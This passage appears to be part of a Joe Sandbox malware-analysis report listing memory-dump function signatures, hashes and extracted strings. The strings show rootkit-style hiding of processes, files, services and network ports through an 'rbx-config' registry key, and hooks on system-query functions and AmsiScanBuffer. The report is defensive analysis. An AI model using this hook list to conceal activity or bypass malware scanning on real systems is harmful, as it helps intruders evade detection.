                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 0cc463f220939676752168fcadcdbc4bf167e07fe2b2dd0cac9a0bd593e670e8
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: E3111526710F04CAEB40CB60EC583A873A4F76E759F840E21EA6D867E4DB78C1588344
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 9443d602d0b049153862e9eaa237bd29413aa500a4ba3f93029a44f067b5ebe9
                                                  • Instruction ID: d5465d8fceebc614196c05a2e9d299c296dfbd2f957bc60ba9a9d9a406bfc6a4
                                                  • Opcode Fuzzy Hash: 9443d602d0b049153862e9eaa237bd29413aa500a4ba3f93029a44f067b5ebe9
                                                  • Instruction Fuzzy Hash: B9E01A62600E84D7EB59CB67EC48159E7A1FB9EFC2F098034DA0947394FE38D2998704
                                                  APIs
                                                    • Part of subcall function 000002527DEED220: HeapAlloc.KERNEL32(?,?,00000000,000002527DEEC987), ref: 000002527DEED275
                                                    • Part of subcall function 000002527DEF0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000002527DEF0EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000002527DEEDB99
                                                    • Part of subcall function 000002527DEED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002527DEE674A), ref: 000002527DEED2B6
                                                    • Part of subcall function 000002527DEED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002527DEE674A), ref: 000002527DEED2C0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: c07f9a585ac843c6921433f0fdea2d297c21bfaddc27d7bcd2e7a4727e6328e2
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: D681C522304E80C7FB22DB72ED483AEF791E78A7A5F4C4225AE9D177D5DA38C1458708
                                                  APIs
                                                    • Part of subcall function 000002527DF1D220: HeapAlloc.KERNEL32(?,?,00000000,000002527DF1C987), ref: 000002527DF1D275
                                                    • Part of subcall function 000002527DF20EB8: _invalid_parameter_noinfo.LIBCMT ref: 000002527DF20EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000002527DF1DB99
                                                    • Part of subcall function 000002527DF1D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002527DF1674A), ref: 000002527DF1D2B6
                                                    • Part of subcall function 000002527DF1D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002527DF1674A), ref: 000002527DF1D2C0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: b7117592f5ab76d0c94a240fa47c4acfae9d0b609d8af51fe51564967c74c9dd
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: 7681D822304E80C5EB24DB61AD5835EE7B1E78A7E5F484116EEBD07BD5DE39C0498709
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 4af79898feb1b93dacd28f62de339da56f7d2ef3977a866294e83a36f287c84d
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 04B1AE22211AD0C7EB5BDF25D818B99F3E4FB4AB86F505016DE49537D8DA34EC48C348
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                                  • Instruction ID: 7e3d3278614c9bfdb103acc3d9d4766a690968ba0164609aa050c2b9a89c7f49
                                                  • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                                  • Instruction Fuzzy Hash: 2FA12C22704E80CBFB22DB759C48BADFBE1E34BB95F185015DE99276D5CA34D48AC708
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                                  • Instruction ID: fa49b1d64962245c50ffc34b9268f9be7672074ab2a713e7e1a9fd69c8d21e2e
                                                  • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                                  • Instruction Fuzzy Hash: 0981C832308E40C7EB26DF32AC48B6EEBD1E78AB95F444525AE99177D5DE38D0858708
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                  • Instruction ID: 58356ce80f55609ff6ea5191101c2d0737016c4064a0c7190fa1ec3818f18161
                                                  • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                  • Instruction Fuzzy Hash: 071165B1615990CBF7ABDF39AC5931DB790E30E386F448429D44D86AD8C73DC4948F18

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: c0ef9440ac4a20cc3c9d50514f99da7a9e95b74d68c9fde32309cd6cece48c34
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 30712826210F50C6EB51DF71EC9869CA3A5FB9EB8AF401111DE4D43BE8DE38C588C358

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 9f3f21ac42aed9d24c02f805a3c319f8f73e7bf5ac037e2da922d0293fc6c475
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: DE712936610E51C5EB20DF21EC5879EA3A4FB8AB8AF445111DE6D47BE8DE39C44CC389

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 68607c258b3b756c840ced296594d84ce23c67e02429b6bb4dcca1cb9a3c0264
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 03519E60110E8AE6FB00DFA9EC4E7D9A320F74E796F804513D829025E5DE7D925EC39B

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 838cd6f29ce7e40f84a4ab4f924f8ac258e3841ab7bba4a872a7197607d2f7dd
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: C5514972210F84DBE765CF62E84835AB7A1F79AF9AF444124DE4907798EF3CD2498704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 73533d43430c2d14b3d8dbb7f21781bc5881ebdb20f8ca614db78c8ba4196ba8
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: C4514A32210F84DAEB24CF62E84936AB7A1F78AF9AF444124DE5907798DF3CD149C745

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 137d80768644319c4a49c6ccdccd2821c15b78749ba22884419e0dda4a8d3a4a
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: B951BF21701F04D2FA56DB66AC083A9A260EB4FBB2F8807259E39473C5EF38D549C648

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 2c41e001b67c40774395749805d35b7742b881be90460d1df5fc50e4507caa42
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 9651CF22701F44D2EB14DB56AC087AAA2A0EB4EBB2F5C0724DE3D473D4DF39D44D864A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 378b8b4f2c5a862f1f162503f3ed69297de2af60af824dd2f5f444d4beeb1056
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 51318F32600E41D7F762CB22EC08759E3A1F79EF97F444625AE4943AE4DF38D5598344
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 4b724a26042a4afb85f5e7904725e4bcece06edc3f003052d4af7d3a46f43d67
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 3831C022600E50D6EB21CF12AC0C35AE3A0F78DBD6F440625DE59477E4DF38DA5A8749
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 625590d8b84daccc89ead980f11f1a3e908f2be3777c74960999a79d4a470e7f
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 03319832600F01CBFB52DF22AC88759B3A0F79AF87F4440249E4A437E4EE38E6498244
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 8b9759d823bfe69523bb9ca5c13e9fc5bd12ac1eec536b11dfde2cc8fbf745aa
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 4A318E21610F42CAE710DF22AC4875AB3E1FB8AF96F444125DE6A437E4DE39E8498645
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true
                                                  • Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: f3e54028b8abd315a5b698827b09cd2b890196b2ac17afa17b2327dd36a7f61e
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 90D17A72604B80CBFB22DF75D9483ADB7A0F74A799F500219EA8957BDADB34C488C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true
                                                  • Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
